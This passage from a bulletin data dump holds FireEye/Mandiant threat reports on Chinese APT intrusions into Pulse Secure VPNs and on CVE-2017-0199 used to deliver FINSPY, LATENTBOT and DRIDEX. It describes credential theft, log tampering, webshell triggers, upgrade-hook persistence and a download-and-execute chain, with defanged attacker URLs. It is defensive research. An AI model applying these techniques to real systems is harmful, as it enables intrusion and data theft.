level of access to operate freely within their target environment. The actors also maintained their foothold into the targeted environments exclusively through Pulse Secure webshells and malware without relying on backdoors deployed on internal Windows or Linux endpoints.\n\n_Escalate Privileges_\n\nMandiant observed the actors use three credential harvesting techniques on Windows systems:\n\n * Targeting of clear text passwords and hashes from memory using the credential harvesting tool Mimikatz. Instead of being copied locally and executed on the target system, Mandiant saw evidence of the Mimikatz binary on the source system of an RDP session (i.e. 
the threat actor\u2019s system that was connected to the VPN) through an RDP mapped drive.\n * Copying and exfiltration of the SAM, SECURITY, and SYSTEM registry hives which contained cached NTLM hashes for Local and Domain accounts.\n * Leveraging the Windows Task Manager process to target the Local Security Authority Subsystem Service (LSASS) process memory for NTLM hashes.\n\nIn addition to these privilege escalation techniques, the actors specifically targeted separate privileged accounts belonging to individuals whose unprivileged accounts were previously compromised (likely through the Pulse Secure credential harvesting malware families). It is unclear how the account associations were made by the actor.\n\n_Internal Reconnaissance_\n\nMandiant found evidence that the actors renamed their own workstations that they connected to the VPN of victim networks to mimic the naming convention of their target environment. This practice aligns with the actor\u2019s objective for long-term persistence and evading detection and demonstrates a familiarity with the internal hostnames in the victim environment.\n\nThe actors operated solely by utilizing Windows-based utilities to carry out tasks. Some of the utilities observed were net.exe, quser.exe, powershell.exe, powershell_ise.exe, findstr.exe, netstat.exe, cmd.exe, reg.exe and tasklist.exe.\n\n_Move Laterally_\n\nMost lateral movement originated from compromised Pulse Secure VPN appliances to internal systems within the environment. While connected to the Pulse VPN appliance, the actor\u2019s system was assigned an IP address from the Pulse VPN DHCP pool and they moved laterally throughout the environments by leveraging the Remote Desktop Protocol (RDP), the Secure Shell Protocol (SSH), and browser-based communication to HTTPS hosted resources. 
The actors also accessed other resources such as Microsoft M365 cloud environments using stolen credentials they had previously acquired.\n\nMandiant also observed the actors targeting ESXi host servers. The actor used the ESXi web interface to enable SSH on hosts where it had previously been disabled. When their operations on the system were finished, the actors disabled SSH on the ESXi host again and cleared or preemptively disabled all relevant logging associated with the performed activities. This includes authentication, command history, and message logging on the system.\n\n_Maintain Presence_\n\nMandiant observed the threat actor maintain persistence by compromising the upgrade process on the Pulse Secure Appliance. Persistence was primarily achieved by modifying the legitimate DSUpgrade.pm file to install the ATRIUM webshell across each upgrade performed by an administrator. The actor likely chose DSUpgrade.pm to host their patch logic as it is a core file in the system upgrade procedure, ensuring the patch is applied during updates. The patcher modifies content in /tmp/data as this directory holds the extracted upgrade image the newly upgraded system will boot into. This results in a persistence mechanism which allows the actor to maintain access to the system across updates.\n\nThe actors also achieved persistence in other cases by prepending a bash script to the file /bin/umount, normally used to unmount a Linux filesystem. This binary was targeted by the actor because it is executed by the Pulse Secure appliance during a system upgrade. The actor\u2019s script verifies that the umount binary executes with a specific set of arguments, which are identical to the arguments used by the Pulse Secure appliance to execute the binary. 
The inserted malicious bash script remounts the filesystem as read-write and iterates through a series of bash routines to inject the ATRIUM webshell, hide SLOWPULSE from a legacy file integrity bash script, remove itself from or add itself to the umount file, and validate that the web process is running after a reboot before returning the filesystem to read-only.\n\n_Complete Mission_\n\nThe threat actor\u2019s objectives appear to be stealing credentials, maintaining long-term persistent access to victim networks, and accessing or exfiltrating sensitive data. Mandiant has observed the attackers:\n\n * Staging data related to sensitive projects, often in C:\\Users\\Public\n * Naming exfiltration archives to resemble Windows Updates (KB) or to match the format KB<digits>.zip\n * Using the JAR/ZIP file format for data exfiltration\n * Deleting exfiltrated archives\n\nAnalysis of new malware families is included in the Technical Annex to enable defenders to quickly assess if their respective appliances have been affected. Relevant MITRE ATT&CK techniques, Yara rules and hashes are published on [Mandiant\u2019s GitHub page](<https://github.com/mandiant/pulsesecure_exploitation_countermeasures>).\n\n#### Forensics, Remediation, and Hardening Guidelines\n\nTo begin an investigation, Pulse Secure users should contact their Customer Support Representative for assistance completing the following steps:\n\n 1. Capture memory and a forensic image of the appliance\n 2. Run the Pulse Integrity Checker Tool found online\n 3. Request a decrypted image of each partition and a memory dump\n\nTo remediate a compromised Pulse Secure appliance: \n\n 1. Caution must be taken when determining if a Pulse Secure device was compromised at any previous date. If the Integrity Checker Tool (ICT) was not run before the appliance was updated, the only evidence of compromise will exist in the system rollback partition which cannot be scanned by the ICT. 
If an upgrade was performed without first using the ICT, a manual inspection of the rollback partition is required to determine if the device was previously compromised.\n 2. To ensure that no malicious logic is copied to a clean device, users must perform upgrades from the appliance console rather than the web interface. The console upgrade process follows a separate code path that will not execute files such as DSUpgrade.pm.\n 3. Previous versions of the ICT will exit if run on an unsupported software version. For every ICT scan, ensure that the ICT would have supported the device's version number.\n 4. Reset all passwords in the environment.\n 5. Upgrade to the most recent software version.\n\nTo secure the appliance and assist with future investigations, consider implementing the following:\n\n 1. Enable unauthenticated logging and configure syslog for Events, User & Admin Access\n 2. Forward all logs to a central log repository\n 3. Review logs for unusual authentications and evidence of exploitation\n 4. Regularly run the Integrity Checker Tool\n 5. Apply patches as soon as they are made available\n\n#### Geopolitical Context and Implications for U.S.-China Relations\n\nIn collaboration with intelligence analysts at BAE Systems Applied Intelligence, Mandiant has identified dozens of organizations across the defense, government, telecommunications, high tech, education, transportation, and financial sectors in the U.S. and Europe that have been compromised via vulnerabilities in Pulse Secure VPNs. Historic Mandiant and BAE investigations identified a significant number of these organizations as previous APT5 targets.\n\nNotably, compromised organizations operate in verticals and industries aligned with Beijing\u2019s strategic objectives as outlined in China\u2019s 14th Five Year Plan. Many manufacturers also compete with Chinese businesses in the high tech, green energy, and telecommunications sectors. 
Despite this, we have not directly observed the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi agreement.\n\nTargets of Chinese cyber espionage operations are often selected for their alignment with national strategic goals, and there is a strong correlation between pillar industries listed in policy white papers and targets of Chinese cyber espionage activity.\n\nChina has outlined eight key areas of vital economic interest for development and production which it views as essential to maintaining global competitiveness, under the following categories: energy, healthcare, railway transportation, telecommunications, national defense and stability, advanced manufacturing, network power, and sports and culture.\n\n_Historical Context_\n\nIn the [_Red Line Drawn_](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-china-espionage.pdf>) report, Mandiant documented a significant decline in the volume of Chinese cyber espionage activity in 2014 and assessed that the restructuring of China's military and civilian intelligence agencies significantly impacted Chinese cyber operations. Then, in September 2015, President Xi of China concluded a bilateral agreement with U.S. President Obama to prohibit state-sponsored theft of intellectual property for the purpose of providing commercial advantage. Commercial IP theft has historically been a prominent characteristic of Chinese cyber espionage activity.\n\nIn 2018 we conducted an extensive [review](<https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-executive-s05-redline-redrawn.pdf>) of Chinese cyber espionage operations, both before and after the official announcement of the PLA reforms and bilateral agreement, to determine if there were any corresponding changes in the tactics, techniques, and procedures (TTPs) used during Chinese cyber espionage operations. 
We observed two important changes in the type of information stolen and the geographic distribution of the targets.\n\n * Despite examining hundreds of incidents from January 2016 through mid-2019, we did not find definitive evidence of theft of intellectual property with purely commercial applications in the US. Recent [indictments](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>) by the US Department of Justice suggest that this theft did occur. While we observed other malicious activity, including geopolitical targeting, theft of intellectual property with military applications, and theft of confidential business information, we did not find evidence that these cyber operations violated the Obama-Xi agreement.\n * Between January 2016 and mid-2019, the geographic focus of Chinese cyber operations shifted dramatically to Asia and away from the U.S. and Europe. While the U.S. remained the single most frequently targeted country, it became a much smaller percentage of observed activity. From 2012\u20132015, U.S. targeting constituted nearly 70 percent of all observed Chinese cyber espionage, while from January 2016 through August 2019, U.S. targeting fell to approximately 20 percent of Chinese activity. Targeting of Europe represented a similar proportion of overall Chinese activity to targeting of the Americas.\n\n_Changes in Chinese Espionage Activity between 2019 and 2021_\n\nBased on developments observed between 2019 and 2021, Mandiant Threat Intelligence assesses that most Chinese APT actors now concentrate on lower-volume but more sophisticated, stealthier operations collecting strategic intelligence to support Chinese strategic political, military, and economic goals. 
While some of the technical changes may be the result of the restructuring of China's military and civilian organizations, some changes possibly reflect larger technical trends in cyber operations overall.\n\n * Before the reorganization, it was common to observe multiple Chinese espionage groups targeting the same organization, often targeting the same types of information. Post-2015, this duplication of effort is rare.\n * Chinese espionage groups developed more efficient and purposeful targeting patterns by transitioning away from spearphishing and reliance on end-user software vulnerabilities, and instead began exploiting networking devices and web-facing applications in novel ways. Chinese APT actors also began to leverage supply chain vulnerabilities and to target third-party providers to gain access to primary targets.\n * Recently observed Chinese cyber espionage activity exhibits an increased diligence in operational security, familiarity with network defender investigation techniques, and cognizance of the forensic evidence they leave behind.\n * We observe the resurgence of older Chinese espionage groups, including APT4 and APT5, after long periods of dormancy, while currently active groups engage in frequent and widespread campaigns.\n\n_Redline Withdrawn?_\n\nThe Obama-Xi agreement prohibits the theft of intellectual property with purely commercial applications for the purpose of gaining a competitive advantage. 
It does not cover government or diplomatic information, sensitive business communications, IT data, PII, or intellectual property with military or dual use applications.\n\n * We have direct evidence of UNC2630, UNC2717 and other Chinese APT actors stealing credentials, email communications, and intellectual property with dual commercial and military applications.\n * Throughout our investigations, we did not directly observe the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi agreement.\n\nGiven the narrow definition of commercial intellectual property theft and the limited availability of forensic evidence, it is possible that our assessment will change with the discovery of new information.\n\nEvidence collected by Mandiant over the past decade suggests that norms and diplomatic agreements do not significantly limit China's use of its cyber threat capabilities, particularly when serving high-priority missions.\n\nThe greater ambition and risk tolerance demonstrated by Chinese policymakers since 2019 indicates that the tempo of Chinese state-sponsored activity may increase in the near future and that the Chinese cyber threat apparatus presents a renewed and serious threat to US and European commercial entities.\n\n#### Acknowledgements\n\nMandiant would like to thank analysts at BAE Systems Applied Intelligence, Stroz Friedberg, and Pulse Secure for their hard work, collaboration and partnership. The team would also like to thank Scott Henderson, Kelli Vanderlee, Jacqueline O'Leary, Michelle Cantos, and all the analysts who worked on Mandiant\u2019s _Red Line Redrawn_ project. 
The team would also like to thank Mike Dockry, Josh Villanueva, Keith Knapp, and all the incident responders who worked on these engagements.\n\n#### Additional Resources\n\n * [CISA Alert (AA21-110A): Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa-21-110a>)\n * [Pulse Secure Advisory SA44101: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n * [Pulse Secure Advisory SA44784: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>)\n * [Pulse Secure Customer FAQ KB44764: PCS Security Integrity Tool Enhancements](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44764>)\n * [Pulse Secure KB44755: Pulse Connect Secure (PCS) Integrity Assurance](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>)\n\n#### Detecting the Techniques\n\nThe following lists, grouped by platform, contain the specific FireEye product detection names for the malware families associated with this updated information.\n\n**Network Security, Email Security, Detection On Demand, Malware File Scanning, Malware File Storage Scanning**\n\n * FE_APT_Tool_Linux32_BLOODMINE_1\n * FE_APT_Tool_Linux_BLOODMINE_1\n * FE_APT_Tool_Linux32_BLOODBANK_1\n * FE_APT_Tool_Linux_BLOODBANK_1\n * FE_APT_Tool_Linux32_CLEANPULSE_1\n * FE_APT_Tool_Linux_CLEANPULSE_1\n * FE_APT_Webshell_PL_RAPIDPULSE_1\n * FEC_APT_Webshell_PL_RAPIDPULSE_1\n\n**Endpoint Security: Real-Time Detection (IOC)**\n\n * BLOODBANK (UTILITY)\n * BLOODMINE (UTILITY)\n\n**Helix**\n\nEstablish Foothold:\n\n * WINDOWS METHODOLOGY [User Account Created]\n * WINDOWS METHODOLOGY [User Created - Net Command]\n\nEscalate Privileges:\n\n * WINDOWS METHODOLOGY [Mimikatz Args]\n * WINDOWS METHODOLOGY [Invoke-Mimikatz Powershell Artifacts]\n * WINDOWS METHODOLOGY [LSASS Memory Access]\n * WINDOWS METHODOLOGY [LSASS Generic Dump Activity]\n\nInternal Reconnaissance:\n\n * WINDOWS ANALYTICS [Recon Commands]\n\nMove Laterally:\n\n * WINDOWS ANALYTICS [Abnormal RDP Logon]\n * OFFICE 365 ANALYTICS [Abnormal Logon]\n\n#### Technical Annex\n\n_BLOODMINE_\n\nBLOODMINE is a utility for parsing Pulse Secure Connect log files. It extracts information related to logins, Message IDs and Web Requests and copies the relevant data to another file.\n\nThe sample takes three command line arguments:\n\n 1. Filename to read\n 2. Filename to write\n 3. Timeout interval\n\nIt parses the input file for the following login status codes:\n\n * AUT31504\n * AUT24414\n * AUT22673\n * AUT22886\n * AUT23574\n\nIt parses the input file for the web result code WEB20174. If it finds a web result code, it looks for the following file extensions:\n\n * .css\n * .jpg\n * .png\n * .gif\n * .ico\n * .js\n * .jsp\n\nThese strings indicate the type of data that is collected from web requests:\n\n * Web login, IP: %s, User: %s, Realm: %s, Roles: %s, Browser: %s\n * Agent login, IP: %s, User: %s, Realm: %s, Roles: %s, Client: %s\n * Logout, IP: %s, User: %s, Realm: %s, Roles: %s\n * Session end, IP: %s, User: %s, Realm: %s, Roles: %s\n * New session, IP: %s, User: %s, Realm: %s, Roles: %s, New IP: %s\n * Host check, Policy: %s\n * WebRequest completed, IP: %s, User: %s, Realm: %s, Roles: %s, %s to %s://%s:%s/%s from %s\n\n_BLOODBANK_\n\nBLOODBANK is a credential theft utility that parses two LMDB (an in-memory database) files and expects an output file to be given at the command prompt. 
BLOODBANK takes advantage of a legitimate process that supports Single Sign On functionality and looks for plaintext passwords when they are briefly loaded in memory.\n\nThe utility parses the following two files containing password hashes or plaintext passwords:\n\n * /home/runtime/mtmp/lmdb/data0/data.mdb\n * /home/runtime/mtmp/system\n\nBLOODBANK expects an output file as a command line parameter; otherwise it prints a file open error. It contains the following strings, which it likely targets for extraction:\n\n * PRIMARY\n * SECONDARY\n * remoteaddr\n * user@\n * logicUR\n * logicTim\n * passw@\n * userAge\n * realm\n * Sourc\n\n_CLEANPULSE_\n\nCLEANPULSE is a memory patching utility that may be used to prevent certain log events from occurring. The utility inserts two strings from the command line into the target process and patches code to conditionally circumvent a function call in the original executable.\n\nFile Name | File Type | Size | Compile Time\n---|---|---|---\ndsrlog | ELF.X86 | 13332 | \n\nThe utility expects to be run from the command line as follows:\n\n    drslog <pid> <code2_string> <code3_string> <command>\n\nWhere <pid> is the process ID to patch in memory, <code2_string> and <code3_string> are two strings to write into the target process, and <command> is either 'e' or 'E' for installation or 'u' or 'U' for uninstallation.\n\nDuring installation (using the 'e' or 'E' <command>), the <code2_string> and <code3_string> command line strings are written to the target process at hard-coded memory addresses, a small amount of code is written, and a jump instruction to the code snippet is patched into the memory of the target process. 
The added code checks whether an argument is equal to either the <code2_string> or <code3_string> string, and if so, skips a function call in the target process.\n\nDuring uninstall (using the 'u' or 'U' <command>) the patch jump location is overwritten with what appears to be the original 8 bytes of instructions, and the two additional memory buffers and the code snippet appear to be overwritten with zeros.\n\nThe CLEANPULSE utility is highly specific to a victim environment. It does not contain any validation code when patching (i.e. verifying that the expected code is present prior to modifying it), and it contains hard-coded addresses to patch.\n\nThe target code to patch appears to be the byte sequence: 89 4C 24 08 FF 52 04. This appears as the last bytes in the patched code, and is the 8 bytes written when the uninstall 'u' command is given.\n\nThese bytes correspond to the following two instructions:\n\n    .data:0804B138 89 4C 24 08    mov [esp+8], ecx\n    .data:0804B13C FF 52 04       call dword ptr [edx+4]\n\nThis byte sequence occurs at the hard-coded patch address the utility expects in the executable dslogserver. Based on status and error messages in nearby functions, dslogserver appears to be related to log event handling, and the purpose of the CLEANPULSE utility may be to prevent certain events from being logged.\n\nThere are several un-referenced functions that appear to have been taken from the open source project PUPYRAT. It is likely that the actor re-purposed this open source code, using PUPYRAT as a simple template project.\n\n_RAPIDPULSE_\n\nRAPIDPULSE is a webshell capable of arbitrary file read. As is common with other webshells, RAPIDPULSE exists as a modification to a legitimate Pulse Secure file.\n\nThe webshell modifies the legitimate file's main routine, which compares the HTTP query parameter named deviceid to a specific key value. 
If the parameter matches, the sample uses an RC4 key to decrypt the HTTP query parameter named hmacTime. This decrypted value is a filename which the sample then opens, reads, RC4 encrypts with the same key, base64 encodes, then writes to stdout. The appliance redirects stdout as the response to HTTP requests. This serves as an encrypted file download for the attacker.\n\n#### Integrity Checker Tool and Other Validation Checks\n\nIn our public report, we noted two code families that manipulate check_integrity.sh, a legitimate script used during a normal system upgrade. This validation script was modified by the actor to exit early so that it would not perform the intended checks.\n\nPer Ivanti, the validation provided by check_integrity.sh is a separate validation feature and not the same as the [Integrity Checker Tool (ICT)](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) available on their website. They recommend that organizations use the online ICT to confirm that hashes of files on their Pulse Secure devices match Ivanti\u2019s list of known good hashes. 
Please note that the ICT does not scan the rollback partition.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-05-27T00:00:00", "type": "fireeye", "title": "Re-Checking Your Pulse: Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-27T00:00:00", "id": "FIREEYE:61901D6D8B7FE74193954DA723EA43FC", "href": "https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-05-04T21:22:49", "description": "FireEye recently identified a vulnerability \u2013 CVE-2017-0199 \u2013 that allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a Microsoft Office RTF document containing an embedded exploit. 
We worked with Microsoft and [published the technical details of this vulnerability](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) as soon as a patch was made available.\n\nIn this follow-up post, we discuss some of the campaigns we observed leveraging the CVE-2017-0199 zero-day in the days, weeks and months leading up to the patch being released.\n\n#### CVE-2017-0199 Used by Multiple Actors\n\nFireEye assesses with moderate confidence that CVE-2017-0199 was leveraged by financially motivated and nation-state actors prior to its disclosure. Actors leveraging FINSPY and LATENTBOT used the zero-day as early as January and March, and similarities between their implementations suggest they obtained exploit code from a shared source. Recent DRIDEX activity began following a disclosure on April 7, 2017.\n\n#### FINSPY Malware Used to Target Russian-Speaking Victims\n\nAs early as Jan. 25, 2017, lure documents referencing a Russian Ministry of Defense decree and a manual allegedly published in the \"Donetsk People's Republic\" exploited CVE-2017-0199 to deliver FINSPY payloads. Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.\n\nThe malicious document, \u0421\u041f\u0423\u0422\u041d\u0418\u041a \u0420\u0410\u0417\u0412\u0415\u0414\u0427\u0418\u041a\u0410.doc (MD5: c10dabb05a38edd8a9a0ddda1c9af10e), is a weaponized version of a widely available military training manual (Figure 1). Notably, this version purports to have been published in the \u201cDonetsk People's Republic,\u201d the name given to territory controlled by anti-Kyiv rebels in Eastern Ukraine.\n\nThe initial malicious document downloaded further payloads, including malware and a decoy document from 95.141.38.110. 
This site was open indexed to allow recovery of additional lure content, including prikaz.doc (MD5: 0F2B7068ABFF00D01CA7E64589E5AFD9), which claims to be a Russian Ministry of Defense decree approving a forest management plan.\n\nPer a 2015 [report](<https://citizenlab.org/2015/10/mapping-finfishers-continuing-proliferation/>) from CitizenLab, Gamma Group licenses their software to clients and each client uses unique infrastructure, making it likely that the two documents are being used by a single client.\n\nFINSPY malware is sold by Gamma Group, an Anglo-German \u201clawful intercept\u201d company. Gamma Group works on behalf of numerous nation-state clients, limiting insight into the ultimate sponsor of the activity. The FINSPY malware was heavily obfuscated, preventing the extraction of command and control (C2) information.\n\n\n\nFigure 1: FINSPY Lure Purporting to be Russian Military Manual\n\n#### CVE-2017-0199 Used to Distribute LATENTBOT\n\nAs early as March 4, 2017, malicious documents exploiting CVE-2017-0199 were used to deliver the [LATENTBOT malware](<https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html>). The malware, which includes credential theft capability, has thus far only been observed by FireEye iSIGHT Intelligence in financially motivated threat activity. Additionally, generic lures used in this most recent campaign are consistent with methods employed by financially motivated actors.\n\nLATENTBOT is a modular and highly obfuscated type of malware first discovered by FireEye iSIGHT intelligence in December 2015. It is capable of a variety of functions, including credential theft, hard drive and data wiping, disabling security software, and remote desktop functionality. Recently, we observed LATENTBOT campaigns using Microsoft Word Intruder (MWI).\n\nThe lure documents distributing LATENTBOT malware used generic social engineering. 
The documents that were used are shown in Table 1, and all used 217.12.203.90 as a C2 domain.\n\n| **File Name** | **MD5 Hash** |\n|---|---|\n| hire_form.doc | 5ebfd13250dd0408e3de594e419f9e01 |\n| !!!!URGENT!!!!READ!!!.doc | 1b17ccf5109a9342b59bded31e1ffb18, 6e9483edacdc2b6f6ed45c526cf4cf7b |\n| PDP.doc | 4a81b6ac8aa0f86719a574d7546d563f |\n| document.doc | 65a558e9fe907dc5790e8a592364f64e |\n\nTable 1: LATENTBOT Documents\n\nOn April 10, the actors altered their infrastructure to deliver TERDOT payloads instead of LATENTBOT. This TERDOT payload (MD5: e3b600a59eea9b2ea7a0d4e3c45074da) beacons to http://185.77.129.103/SBz1efFx/gt45gh.php, then downloads a Tor client and beacons to sudoofk3wgl2gmxm.onion.\n\n#### FINSPY and LATENTBOT Samples Share Origin\n\nShared artifacts in the FINSPY and LATENTBOT samples suggest the same builder was used to create both, indicating the zero-day exploit was supplied to both criminal and cyber espionage operations from the same source.\n\nMalicious documents used in both campaigns share a last revision time of: 2016-11-27 22:42:00 (Figure 2).\n\n\n\nFigure 2: Revision Time Artifact Shared Between FINSPY and LATENTBOT Samples\n\n#### DRIDEX Spam Follows Recent Disclosure\n\nFollowing a disclosure of specifics related to the zero-day on April 7, 2017, the vulnerability was used in DRIDEX spam campaigns, which continue as of the publication of this blog. We cannot confirm the mechanism through which the actors obtained the exploit. These actors may have leveraged knowledge of the vulnerability gained through the disclosure, or been given access to it when it became clear that patching was imminent.\n\nA spam wave was sent out on April 10, 2017, leveraging a \u201cScan Data\u201d lure. 
The attached document leveraged CVE-2017-0199 to install DRIDEX on the victim\u2019s computer.\n\n#### Outlook and Implications\n\nThough only one FINSPY user has been observed leveraging this zero-day exploit, the historic scope of FINSPY, a capability used by several nation states, suggests other customers had access to it. Additionally, this incident exposes the global nature of cyber threats and the value of worldwide perspective \u2013 a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-12T11:00:00", "type": "fireeye", "title": "CVE-2017-0199 Used as Zero Day to Distribute FINSPY Espionage Malware and LATENTBOT Cyber Crime Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-04-12T11:00:00", "id": "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "href": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 
{"lastseen": "2018-08-31T00:18:21", "description": "FireEye recently detected malicious Microsoft Office RTF documents that leverage CVE-2017-0199, a previously undisclosed vulnerability. This vulnerability allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a document containing an embedded exploit. FireEye has observed Office documents exploiting CVE-2017-0199 that download and execute malware payloads from different well-known malware families.\n\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch by Microsoft to address the vulnerability, which can be found [here.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>)\n\nThe vulnerability bypassed most mitigations prior to patch availability; however, FireEye email and network products detected the malicious documents. FireEye recommends that Microsoft Office users apply the [patch from Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>).\n\n#### Attack Scenario\n\nThe attack occurs in the following manner:\n\n 1. A threat actor emails a Microsoft Word document to a targeted user with an embedded OLE2 link object\n 2. When the user opens the document, winword.exe issues an HTTP request to a remote server to retrieve a malicious HTA file\n 3. The file returned by the server is a fake RTF file with an embedded malicious script\n 4. 
Winword.exe looks up the file handler for application/hta through a COM object, which causes the Microsoft HTA application (mshta.exe) to load and execute the malicious script\n\nIn the two documents that FireEye observed prior to the [initial blog](<https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html>) acknowledging these attacks, malicious scripts terminated the winword.exe processes, downloaded additional payloads, and loaded decoy documents. The original winword.exe process was terminated to conceal a user prompt generated by the OLE2link. Figure 1 shows this prompt.\n\n\n\nFigure 1: User prompt hidden by the Visual Basic script\n\n#### Document 1 - (MD5: 5ebfd13250dd0408e3de594e419f9e01)\n\nThe first malicious document identified by FireEye had three stages. An embedded OLE2 link object causes winword.exe to reach out to the following URL to download the stage one malicious HTA file:\n\nhttp[:]//46.102.152[.]129/template.doc\n\nOnce downloaded, the malicious HTA file is processed by the \u201capplication/hta\u201d handler. The highlighted line in Figure 2 shows the first download occurring, followed by the additional malicious payloads.\n\n\n\nFigure 2: Live attack scenario\n\nOnce downloaded, the template file was stored in the user\u2019s temporary internet files with the name template[?].hta, where [?] is determined at run time.\n\n#### The Logic Bug\n\nMshta.exe is responsible for handling the Content-Type \u201capplication/hta,\u201d parsing the content, and executing the script. Figure 3 shows winword.exe querying registry value of CLSID for the \u201capplication/hta\u201d handler.\n\n\n\nFigure 3: Winword query registry value\n\nWinword.exe makes a request to the DCOMLaunch service, which in turn causes the svchost.exe process hosting DCOMLaunch to execute mshta.exe. Mshta.exe then executes the script embedded in the malicious HTA document. 
Figure 4 shows the deobfuscated VBScript from the first stage download.\n\n\n\nFigure 4: First document, stage one VBScript\n\nThe script shown in Figure 4 performs the following malicious actions:\n\n 1. Terminates the winword.exe process with taskkill.exe to hide the prompt shown in Figure 1.\n 2. Downloads a VBScript file from http[:]//www.modani[.]com/media/wysiwyg/ww.vbs and saves it to %appdata%\\Microsoft\\Windows\\maintenance.vbs\n 3. Downloads a decoy document from http[:]//www.modani[.]com/media/wysiwyg/questions.doc and saves it to %temp%\\document.doc\n 4. Cleans up the Word Resiliency keys for Word versions 15.0 and 16.0 so that Microsoft Word will restart normally\n 5. Executes the malicious stage two VBScript: %appdata%\\Microsoft\\Windows\\maintenance.vbs\n 6. Opens the decoy document, %temp%\\document.doc, to hide the malicious activity from the user\n\nOnce executed, the downloaded stage two VBScript (ww.vbs/maintenance.vbs) performs the following actions:\n\n 1. Writes an embedded obfuscated script to %TMP%/eoobvfwiglhiliqougukgm.js\n 2. Executes the script\n\nThe obfuscated eoobvfwiglhiliqougukgm.js script performs the following actions when executed:\n\n 1. Attempts to delete itself from the system\n 2. Attempts to download http[:]//www.modani[.]com/media/wysiwyg/wood.exe (at most 44 times), and save the file to %TMP%\\dcihprianeeyirdeuceulx.exe\n 3. Executes %TMP%\\dcihprianeeyirdeuceulx.exe\n\nFigure 5 shows the process execution chain of events.\n\n\n\nFigure 5: Process creation events\n\nThe final payload utilized in this malware is a newer variant of the LATENTBOT malware family. 
